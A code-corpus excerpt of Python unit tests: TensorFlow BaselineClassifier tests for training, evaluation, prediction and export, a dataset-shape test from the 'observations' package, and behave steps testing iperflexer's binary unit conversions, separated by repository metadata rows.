self._testTrainWithOneDimLabel(n_classes=4)
def _testTrainWithTwoDimsWeight(self, n_classes):
batch_size = 20
est = baseline.BaselineClassifierV2(
weight_column='w', n_classes=n_classes, model_dir=self._model_dir)
data_rank_1 = np.array([0, 1])
data_rank_2 = np.array([[0], [1]])
self.assertEqual((2,), data_rank_1.shape)
self.assertEqual((2, 1), data_rank_2.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1, 'w': data_rank_2}, y=data_rank_1,
batch_size=batch_size, num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(n_classes, 200)
def testBinaryClassesTrainWithTwoDimsWeight(self):
self._testTrainWithTwoDimsWeight(n_classes=2)
def testMultiClassesTrainWithTwoDimsWeight(self):
self._testTrainWithTwoDimsWeight(n_classes=4)
def _testTrainWithOneDimWeight(self, n_classes):
batch_size = 20
est = baseline.BaselineClassifierV2(
weight_column='w', n_classes=n_classes, model_dir=self._model_dir)
data_rank_1 = np.array([0, 1])
self.assertEqual((2,), data_rank_1.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1, 'w': data_rank_1}, y=data_rank_1,
batch_size=batch_size, num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(n_classes, 200)
def testBinaryClassesTrainWithOneDimWeight(self):
self._testTrainWithOneDimWeight(n_classes=2)
def testMultiClassesTrainWithOneDimWeight(self):
self._testTrainWithOneDimWeight(n_classes=4)
def _testFromScratch(self, n_classes):
label = 1
age = 17
# For binary classifier:
# loss = sigmoid_cross_entropy(logits, label) where logits=0 (weights are
# all zero initially) and label = 1 so,
# loss = 1 * -log ( sigmoid(logits) ) = 0.69315
# For multi class classifier:
# loss = cross_entropy(logits, label) where logits are all 0s (weights are
# all zero initially) and label = 1 so,
# loss = 1 * -log ( 1.0 / n_classes )
# For this particular test case, as logits are same, the formula
# 1 * -log ( 1.0 / n_classes ) covers both binary and multi class cases.
mock_optimizer = mock_optimizer_v2(
self, expected_loss=-1 * math.log(1.0 / n_classes))
est = baseline.BaselineClassifierV2(
n_classes=n_classes,
optimizer=mock_optimizer,
model_dir=self._model_dir)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
est.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self.assertEqual(num_steps,
est.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
n_classes,
expected_global_step=num_steps,
expected_bias=[0.] if n_classes == 2 else [.0] * n_classes)
def testBinaryClassesFromScratch(self):
self._testFromScratch(n_classes=2)
def testMultiClassesFromScratch(self):
self._testFromScratch(n_classes=4)
def _testFromCheckpoint(self, n_classes):
# Create initial checkpoint.
label = 1
age = 17
bias = [-1.0] if n_classes == 2 else [-1.0] * n_classes
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
initial_global_step, name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
# For binary classifier:
# logits = bias = -1.
# loss = sigmoid_cross_entropy(logits, label)
# so, loss = 1 * -log ( sigmoid(-1) ) = 1.3133
# For multi class classifier:
# loss = cross_entropy(logits, label)
# where logits = bias and label = 1
# so, loss = 1 * -log ( softmax(logits)[1] )
if n_classes == 2:
expected_loss = 1.3133
else:
logits = bias
logits_exp = np.exp(logits)
softmax = logits_exp / logits_exp.sum()
expected_loss = -1 * math.log(softmax[label])
mock_optimizer = mock_optimizer_v2(self, expected_loss=expected_loss)
est = baseline.BaselineClassifierV2(
n_classes=n_classes,
optimizer=mock_optimizer,
model_dir=self._model_dir)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
est.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self.assertEqual(initial_global_step + num_steps,
est.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
n_classes,
expected_global_step=initial_global_step + num_steps,
expected_bias=bias)
def testBinaryClassesFromCheckpoint(self):
self._testFromCheckpoint(n_classes=2)
def testMultiClassesFromCheckpoint(self):
self._testFromCheckpoint(n_classes=4)
def _testFromCheckpointFloatLabels(self, n_classes):
"""Tests float labels for binary classification."""
# Create initial checkpoint.
if n_classes > 2:
return
label = 0.8
age = 17
bias = [-1.0]
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
initial_global_step, name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
# logits = bias = -1.
# loss = sigmoid_cross_entropy(logits, label)
# => loss = -0.8 * log(sigmoid(-1)) -0.2 * log(sigmoid(+1)) = 1.1132617
mock_optimizer = mock_optimizer_v2(self, expected_loss=1.1132617)
est = baseline.BaselineClassifierV2(
n_classes=n_classes,
optimizer=mock_optimizer,
model_dir=self._model_dir)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
est.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self.assertEqual(initial_global_step + num_steps,
est.get_variable_value(mock_optimizer.iterations.name))
def testBinaryClassesFromCheckpointFloatLabels(self):
self._testFromCheckpointFloatLabels(n_classes=2)
def testMultiClassesFromCheckpointFloatLabels(self):
self._testFromCheckpointFloatLabels(n_classes=4)
def _testFromCheckpointMultiBatch(self, n_classes):
# Create initial checkpoint.
label = [1, 0]
age = [17, 18.5]
batch_size = 2
# For binary case, the expected weight has shape (1,1). For multi class
# case, the shape is (1, n_classes). In order to test the weights, set
# weights as 2.0 * range(n_classes).
bias = [-1.0] if n_classes == 2 else [-1.0] * n_classes
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
initial_global_step, name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
# For binary classifier:
# logits = bias
# logits[0] = -1.
# logits[1] = -1.
# loss = sigmoid_cross_entropy(logits, label)
# so, loss[0] = 1 * -log ( sigmoid(-1) ) = 1.3133
# loss[1] = (1 - 0) * -log ( 1- sigmoid(-1) ) = 0.3132
# For multi class classifier:
# loss = cross_entropy(logits, label)
# where logits = bias and label = [1, 0]
# so, loss = 1 * -log ( softmax(logits)[label] )
if n_classes == 2:
expected_loss = (1.3133 + 0.3132) / 2
else:
# Expand logits since batch_size=2
logits = bias * np.ones(shape=(2, 1))
logits_exp = np.exp(logits)
softmax_row_0 = logits_exp[0] / logits_exp[0].sum()
softmax_row_1 = logits_exp[1] / logits_exp[1].sum()
expected_loss_0 = -1 * math.log(softmax_row_0[label[0]])
expected_loss_1 = -1 * math.log(softmax_row_1[label[1]])
expected_loss = (expected_loss_0 + expected_loss_1) / 2
mock_optimizer = mock_optimizer_v2(self, expected_loss=expected_loss)
est = baseline.BaselineClassifierV2(
n_classes=n_classes,
optimizer=mock_optimizer,
model_dir=self._model_dir)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
est.train(
input_fn=lambda: ({'age': (age)}, (label)),
steps=num_steps)
self.assertEqual(initial_global_step + num_steps,
est.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
n_classes,
expected_global_step=initial_global_step + num_steps,
expected_bias=bias)
def testBinaryClassesFromCheckpointMultiBatch(self):
self._testFromCheckpointMultiBatch(n_classes=2)
def testMultiClassesFromCheckpointMultiBatch(self):
self._testFromCheckpointMultiBatch(n_classes=4)
class BaselineClassifierEvaluationTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
shutil.rmtree(self._model_dir)
def _test_evaluation_for_simple_data(self, n_classes):
label = 1
age = 1.
bias = [-1.0] if n_classes == 2 else [-1.0] * n_classes
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
100, name=tf.compat.v1.GraphKeys.GLOBAL_STEP, dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
est = _baseline_classifier_fn(
n_classes=n_classes,
model_dir=self._model_dir)
eval_metrics = est.evaluate(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=1)
if n_classes == 2:
# Binary classes: loss = -log(sigmoid(-1)) / batch size = 1.3133
# Prediction = sigmoid(-1) = 0.2689
expected_metrics = {
metric_keys.MetricKeys.LOSS: 1.3133,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: 1.3133,
metric_keys.MetricKeys.ACCURACY: 0.,
metric_keys.MetricKeys.PRECISION: 0.,
metric_keys.MetricKeys.RECALL: 0.,
metric_keys.MetricKeys.PREDICTION_MEAN: 0.2689,
metric_keys.MetricKeys.LABEL_MEAN: 1.,
metric_keys.MetricKeys.ACCURACY_BASELINE: 1,
metric_keys.MetricKeys.AUC: 0.,
metric_keys.MetricKeys.AUC_PR: 1.,
}
else:
# Multi classes: loss = 1 * -log ( softmax(logits)[label] )
logits = bias
logits_exp = np.exp(logits)
softmax = logits_exp / logits_exp.sum()
expected_loss = -1 * math.log(softmax[label])
expected_metrics = {
metric_keys.MetricKeys.LOSS: expected_loss,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: expected_loss,
metric_keys.MetricKeys.ACCURACY: 0.,
}
self.assertAllClose(sorted_key_dict(expected_metrics),
sorted_key_dict(eval_metrics), rtol=1e-3)
def test_binary_classes_evaluation_for_simple_data(self):
self._test_evaluation_for_simple_data(n_classes=2)
def test_multi_classes_evaluation_for_simple_data(self):
self._test_evaluation_for_simple_data(n_classes=4)
def _test_evaluation_batch(self, n_classes):
"""Tests evaluation for batch_size==2."""
label = [1, 0]
age = [17., 18.]
bias = [-1.0] if n_classes == 2 else [-1.0] * n_classes
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
initial_global_step, name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
est = _baseline_classifier_fn(
n_classes=n_classes,
model_dir=self._model_dir)
eval_metrics = est.evaluate(
input_fn=lambda: ({'age': (age)}, (label)), steps=1)
if n_classes == 2:
# Logits are (-1., -1.) labels are (1, 0).
# Loss is
# loss for row 1: 1 * -log(sigmoid(-1)) = 1.3133
# loss for row 2: (1 - 0) * -log(1 - sigmoid(-1)) = 0.3132
# Prediction = sigmoid(-1) = 0.2689
expected_loss = (1.3133 + 0.3132) / 2 # batch size
expected_metrics = {
metric_keys.MetricKeys.LOSS: expected_loss,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: expected_loss,
metric_keys.MetricKeys.ACCURACY: 0.5,
metric_keys.MetricKeys.PRECISION: 0.,
metric_keys.MetricKeys.RECALL: 0.,
metric_keys.MetricKeys.PREDICTION_MEAN: 0.2689,
metric_keys.MetricKeys.LABEL_MEAN: 0.5,
metric_keys.MetricKeys.ACCURACY_BASELINE: 0.5,
metric_keys.MetricKeys.AUC: 0.5,
metric_keys.MetricKeys.AUC_PR: 0.5,
}
else:
# Expand logits since batch_size=2
logits = bias * np.ones(shape=(2, 1))
logits_exp = np.exp(logits)
softmax_row_0 = logits_exp[0] / logits_exp[0].sum()
softmax_row_1 = logits_exp[1] / logits_exp[1].sum()
expected_loss_0 = -1 * math.log(softmax_row_0[label[0]])
expected_loss_1 = -1 * math.log(softmax_row_1[label[1]])
expected_loss = (expected_loss_0 + expected_loss_1) / 2 # batch size
expected_metrics = {
metric_keys.MetricKeys.LOSS: expected_loss,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: expected_loss,
metric_keys.MetricKeys.ACCURACY: 0.5,
}
self.assertAllClose(sorted_key_dict(expected_metrics),
sorted_key_dict(eval_metrics), rtol=1e-3)
def test_binary_classes_evaluation_batch(self):
self._test_evaluation_batch(n_classes=2)
def test_multi_classes_evaluation_batch(self):
self._test_evaluation_batch(n_classes=4)
def _test_evaluation_weights(self, n_classes):
"""Tests evaluation with weights."""
label = [1, 0]
age = [17., 18.]
weights = [1., 2.]
# For binary case, the expected weight has shape (1,1). For multi class
# case, the shape is (1, n_classes). In order to test the weights, set
# weights as 2.0 * range(n_classes).
bias = [-1.0] if n_classes == 2 else [-1.0] * n_classes
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
initial_global_step, name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
est = _baseline_classifier_fn(
n_classes=n_classes,
weight_column='w',
model_dir=self._model_dir)
eval_metrics = est.evaluate(
input_fn=lambda: ({'age': (age), 'w': (weights)}, (label)), steps=1)
if n_classes == 2:
# Logits are (-1., -1.) labels are (1, 0).
# Loss is
# loss for row 1: 1 * -log(sigmoid(-1)) = 1.3133
# loss for row 2: (1 - 0) * -log(1 - sigmoid(-1)) = 0.3132
# weights = [1., 2.]
expected_loss = (1.3133 * 1. + 0.3132 * 2.) / 2 # batch size
loss_mean = (1.3133 * 1. + 0.3132 * 2.) / (1.0 + 2.0)
label_mean = np.average(label, weights=weights)
logits = [-1, -1]
logistics = sigmoid(np.array(logits))
predictions_mean = np.average(logistics, weights=weights)
expected_metrics = {
metric_keys.MetricKeys.LOSS: expected_loss,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: loss_mean,
metric_keys.MetricKeys.ACCURACY: 2. / (1. + 2.),
metric_keys.MetricKeys.PRECISION: 0.,
metric_keys.MetricKeys.RECALL: 0.,
metric_keys.MetricKeys.PREDICTION_MEAN: predictions_mean,
metric_keys.MetricKeys.LABEL_MEAN: label_mean,
metric_keys.MetricKeys.ACCURACY_BASELINE: (
max(label_mean, 1-label_mean)),
metric_keys.MetricKeys.AUC: 0.5,
metric_keys.MetricKeys.AUC_PR: 0.33333,
}
else:
# Multi classes: unweighted_loss = 1 * -log ( soft_max(logits)[label] )
# Expand logits since batch_size=2
logits = bias * np.ones(shape=(2, 1))
logits_exp = np.exp(logits)
softmax_row_0 = logits_exp[0] / logits_exp[0].sum()
softmax_row_1 = logits_exp[1] / logits_exp[1].sum()
expected_loss_0 = -1 * math.log(softmax_row_0[label[0]])
expected_loss_1 = -1 * math.log(softmax_row_1[label[1]])
loss_mean = np.average([expected_loss_0, expected_loss_1],
weights=weights)
expected_loss = (loss_mean * np.sum(weights)) / 2 # batch size
expected_metrics = {
metric_keys.MetricKeys.LOSS: expected_loss,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: loss_mean,
metric_keys.MetricKeys.ACCURACY: 2. / (1. + 2.),
}
self.assertAllClose(sorted_key_dict(expected_metrics),
sorted_key_dict(eval_metrics), rtol=1e-3)
def test_binary_classes_evaluation_weights(self):
self._test_evaluation_weights(n_classes=2)
def test_multi_classes_evaluation_weights(self):
self._test_evaluation_weights(n_classes=4)
class BaselineClassifierPredictTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
shutil.rmtree(self._model_dir)
def _testPredictions(self, n_classes, label_vocabulary, label_output_fn):
"""Tests predict when all variables are one-dimensional."""
age = 1.
bias = [10.0] if n_classes == 2 else [10.0] * n_classes
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(100, name='global_step', dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
est = _baseline_classifier_fn(
label_vocabulary=label_vocabulary,
n_classes=n_classes,
model_dir=self._model_dir)
predict_input_fn = numpy_io.numpy_input_fn(
x={'age': np.array([[age]])},
y=None,
batch_size=1,
num_epochs=1,
shuffle=False)
predictions = list(est.predict(input_fn=predict_input_fn))
if n_classes == 2:
scalar_logits = bias[0]
two_classes_logits = [0, scalar_logits]
two_classes_logits_exp = np.exp(two_classes_logits)
softmax = two_classes_logits_exp / two_classes_logits_exp.sum()
expected_predictions = {
'class_ids': [1],
'all_class_ids': [0, 1],
'classes': [label_output_fn(1)],
'all_classes': [label_output_fn(0), label_output_fn(1)],
'logistic': [sigmoid(np.array(scalar_logits))],
'logits': [scalar_logits],
'probabilities': softmax,
}
else:
onedim_logits = np.array(bias)
class_ids = onedim_logits.argmax()
all_class_ids = list(range(len(onedim_logits)))
logits_exp = np.exp(onedim_logits)
softmax = logits_exp / logits_exp.sum()
expected_predictions = {
'class_ids': [class_ids],
'all_class_ids': all_class_ids,
'classes': [label_output_fn(class_ids)],
'all_classes': [label_output_fn(i) for i in all_class_ids],
'logits': onedim_logits,
'probabilities': softmax,
}
self.assertEqual(1, len(predictions))
# assertAllClose cannot handle byte type.
self.assertEqual(expected_predictions['classes'], predictions[0]['classes'])
expected_predictions.pop('classes')
predictions[0].pop('classes')
self.assertAllEqual(expected_predictions['all_classes'],
predictions[0]['all_classes'])
expected_predictions.pop('all_classes')
predictions[0].pop('all_classes')
self.assertAllClose(sorted_key_dict(expected_predictions),
sorted_key_dict(predictions[0]))
def testBinaryClassesWithoutLabelVocabulary(self):
n_classes = 2
self._testPredictions(n_classes,
label_vocabulary=None,
label_output_fn=lambda x: ('%s' % x).encode())
def testBinaryClassesWithLabelVocabulary(self):
n_classes = 2
self._testPredictions(
n_classes,
label_vocabulary=['class_vocab_{}'.format(i)
for i in range(n_classes)],
label_output_fn=lambda x: ('class_vocab_%s' % x).encode())
def testMultiClassesWithoutLabelVocabulary(self):
n_classes = 4
self._testPredictions(
n_classes,
label_vocabulary=None,
label_output_fn=lambda x: ('%s' % x).encode())
def testMultiClassesWithLabelVocabulary(self):
n_classes = 4
self._testPredictions(
n_classes,
label_vocabulary=['class_vocab_{}'.format(i)
for i in range(n_classes)],
label_output_fn=lambda x: ('class_vocab_%s' % x).encode())
class BaselineClassifierIntegrationTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
shutil.rmtree(self._model_dir)
def _test_complete_flow(self, n_classes, train_input_fn, eval_input_fn,
predict_input_fn, input_dimension, prediction_length):
feature_columns = [
tf.feature_column.numeric_column('x', shape=(input_dimension,))
]
est = _baseline_classifier_fn(
n_classes=n_classes,
model_dir=self._model_dir)
# TRAIN
# learn y = x
est.train(train_input_fn, steps=200)
# EVALUTE
scores = est.evaluate(eval_input_fn)
self.assertEqual(200, scores[tf.compat.v1.GraphKeys.GLOBAL_STEP])
self.assertIn(metric_keys.MetricKeys.LOSS, six.iterkeys(scores))
# PREDICT
predictions = np.array(
[x['classes'] for x in est.predict(predict_input_fn)])
self.assertAllEqual((prediction_length, 1), predictions.shape)
# EXPORT
feature_spec = tf.feature_column.make_parse_example_spec(
feature_columns)
serving_input_receiver_fn = export.build_parsing_serving_input_receiver_fn(
feature_spec)
export_dir = est.export_saved_model(tempfile.mkdtemp(),
serving_input_receiver_fn)
self.assertTrue(tf.compat.v1.gfile.Exists(export_dir))
def _test_numpy_input_fn(self, n_classes):
"""Tests complete flow with numpy_input_fn."""
input_dimension = 4
batch_size = 10
prediction_length = batch_size
data = np.linspace(0., 2., batch_size * input_dimension, dtype=np.float32)
data = data.reshape(batch_size, input_dimension)
target = np.array([1] * batch_size)
train_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=target,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
eval_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=target,
batch_size=batch_size,
num_epochs=1,
shuffle=False)
predict_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=None,
batch_size=batch_size,
num_epochs=1,
shuffle=False)
self._test_complete_flow(
n_classes=n_classes,
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
input_dimension=input_dimension,
prediction_length=prediction_length)
def test_binary_classes_numpy_input_fn(self):
self._test_numpy_input_fn(n_classes=2)
def test_multi_classes_numpy_input_fn(self):
self._test_numpy_input_fn(n_classes=4)
def _test_pandas_input_fn(self, n_classes):
"""Tests complete flow with pandas_input_fn."""
if not HAS_PANDAS:
return
# Pandas DataFrame natually supports 1 dim data only.
input_dimension = 1
batch_size = 10
data = np.array([1., 2., 3., 4.], dtype=np.float32)
target = np.array([1, 0, 1, 0], dtype=np.int32)
x = pd.DataFrame({'x': data})
y = pd.Series(target)
prediction_length = 4
train_input_fn = pandas_io.pandas_input_fn(
x=x, y=y, batch_size=batch_size, num_epochs=None, shuffle=True)
eval_input_fn = pandas_io.pandas_input_fn(
x=x, y=y, batch_size=batch_size, shuffle=False)
predict_input_fn = pandas_io.pandas_input_fn(
x=x, batch_size=batch_size, shuffle=False)
self._test_complete_flow(
n_classes=n_classes,
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
input_dimension=input_dimension,
prediction_length=prediction_length)
def test_binary_classes_pandas_input_fn(self):
self._test_pandas_input_fn(n_classes=2)
def test_multi_classes_pandas_input_fn(self):
self._test_pandas_input_fn(n_classes=4)
def _test_input_fn_from_parse_example(self, n_classes):
"""Tests complete flow with input_fn constructed from parse_example."""
input_dimension = 2
batch_size = 10
prediction_length = batch_size
data = np.linspace(0., 2., batch_size * input_dimension, dtype=np.float32)
data = data.reshape(batch_size, input_dimension)
target = np.array([1] * batch_size, dtype=np.int64)
serialized_examples = []
for x, y in zip(data, target):
example = example_pb2.Example(features=feature_pb2.Features(
feature={
'x':
feature_pb2.Feature(float_list=feature_pb2.FloatList(
value=x)),
'y':
feature_pb2.Feature(int64_list=feature_pb2.Int64List(
value=[y])),
}))
serialized_examples.append(example.SerializeToString())
feature_spec = {
'x': tf.io.FixedLenFeature([input_dimension], tf.dtypes.float32),
'y': tf.io.FixedLenFeature([1], tf.dtypes.int64),
}
def _train_input_fn():
feature_map = tf.compat.v1.io.parse_example(serialized_examples, feature_spec)
features = queue_parsed_features(feature_map)
labels = features.pop('y')
return features, labels
def _eval_input_fn():
feature_map = tf.compat.v1.io.parse_example(
tf.compat.v1.train.limit_epochs(serialized_examples, num_epochs=1),
feature_spec)
features = queue_parsed_features(feature_map)
labels = features.pop('y')
return features, labels
def _predict_input_fn():
feature_map = tf.compat.v1.io.parse_example(
tf.compat.v1.train.limit_epochs(serialized_examples, num_epochs=1),
feature_spec)
features = queue_parsed_features(feature_map)
features.pop('y')
return features, None
self._test_complete_flow(
n_classes=n_classes,
train_input_fn=_train_input_fn,
eval_input_fn=_eval_input_fn,
predict_input_fn=_predict_input_fn,
input_dimension=input_dimension,
prediction_length=prediction_length)
def test_binary_classes_input_fn_from_parse_example(self):
self._test_input_fn_from_parse_example(n_classes=2)
def test_multi_classes_input_fn_from_parse_example(self):
self._test_input_fn_from_parse_example(n_classes=4)
# Tests for Baseline logit_fn.
class BaselineLogitFnTest(tf.test.TestCase):
def test_basic_logit_correctness(self):
"""baseline_logit_fn simply returns the bias variable."""
with tf.Graph().as_default():
bias_var, logits = baseline._baseline_model_fn_builder_v2(
features={'age': [[23.], [31.]]}, num_outputs=2)
with tf.compat.v1.Session() as sess:
sess.run([tf.compat.v1.initializers.global_variables()])
self.assertAllClose([[0., 0.], [0., 0.]], logits.eval())
sess.run(bias_var[0].assign([10., 5.]))
self.assertAllClose([[10., 5.], [10., 5.]], logits.eval())
if __name__ == '__main__':
tf.test.main()
| 35.51297 | 88 | 0.673089 |
4a226a6340a329ba5eaf5f09d74f2c382ff19cfe | 516 | py | Python | tests/r/test_swahili.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | tests/r/test_swahili.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | tests/r/test_swahili.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.swahili import swahili
def test_swahili():
"""Test module swahili.py by downloading
swahili.csv and testing shape of
extracted data has 480 rows and 4 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = swahili(test_path)
try:
assert x_train.shape == (480, 4)
except:
shutil.rmtree(test_path)
raise()
| 21.5 | 44 | 0.753876 |
4a226a66ab50608c545fc92284572a25b14e351d | 7,845 | py | Python | iperflexer/tests/steps/binaryunitconverter.py | rsnakamura/iperflexer | 68f6ac5b3833e0053d6a5ca87bdb605ebbe6e665 | [
"MIT"
] | null | null | null | iperflexer/tests/steps/binaryunitconverter.py | rsnakamura/iperflexer | 68f6ac5b3833e0053d6a5ca87bdb605ebbe6e665 | [
"MIT"
] | null | null | null | iperflexer/tests/steps/binaryunitconverter.py | rsnakamura/iperflexer | 68f6ac5b3833e0053d6a5ca87bdb605ebbe6e665 | [
"MIT"
] | null | null | null |
# python standard library
import random
# third party
from behave import given, when, then
from hamcrest import assert_that, is_, close_to
# this package
from iperflexer.unitconverter import BinaryUnitconverter, BinaryUnitNames
BYTE = 8
BASE = 2
DELTA = 0.0001
@given('a BinaryUnitconverter')
def binaryunitconverter(context):
context.converter = BinaryUnitconverter()
print(context.converter.keys())
return
@when("the user converts from bytes to bits and back")
def bytes_to_bits(context):
context.source = random.randrange(100)
context.expected = context.source * BYTE
context.outcome = context.source * context.converter[BinaryUnitNames.bytes][BinaryUnitNames.bits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.bits][BinaryUnitNames.bytes]
return
@then("the outcome is the correct conversion")
def assert_bits(context):
assert_that(context.outcome,
is_(close_to(value=context.expected,
delta=DELTA)))
assert_that(context.reverse_outcome,
is_(close_to(value=context.source,
delta=DELTA)))
return
@when('the user converts from bits to bytes')
def step_implementation(context):
context.bits = random.randrange(100)
context.expected = context.bits/8.
context.outcome = context.bits * context.converter[BinaryUnitNames.bits][BinaryUnitNames.bytes]
return
@when('the user converts from kibibytes to bits and back')
def step_implementation(context):
context.source = random.randrange(100)
context.expected = context.source * 8 * (2**10)
context.outcome = context.source * context.converter[BinaryUnitNames.kibibytes][BinaryUnitNames.bits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.bits][BinaryUnitNames.kibibytes]
return
@when('the user converts from bits to bits and back')
def step_implementation(context):
context.source = random.randrange(100)
context.expected = context.source
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.bits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.bits][BinaryUnitNames.bits]
return
@when('the user converts from bits to mebibits and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (2.**20)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.mebibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.mebibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to gibibits and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (2.**30)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.gibibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.gibibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to mebibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**20)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.mebibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.mebibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to gibibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**30)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.gibibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.gibibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to tebibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**40)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.tebibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.tebibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to pebibits and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (2.**50)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.pebibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.pebibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to pebibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**50)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.pebibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.pebibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to exbibits and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (2.**60)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.exbibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.exbibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to exbibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**60)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.exbibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.exbibytes][BinaryUnitNames.bits]
return
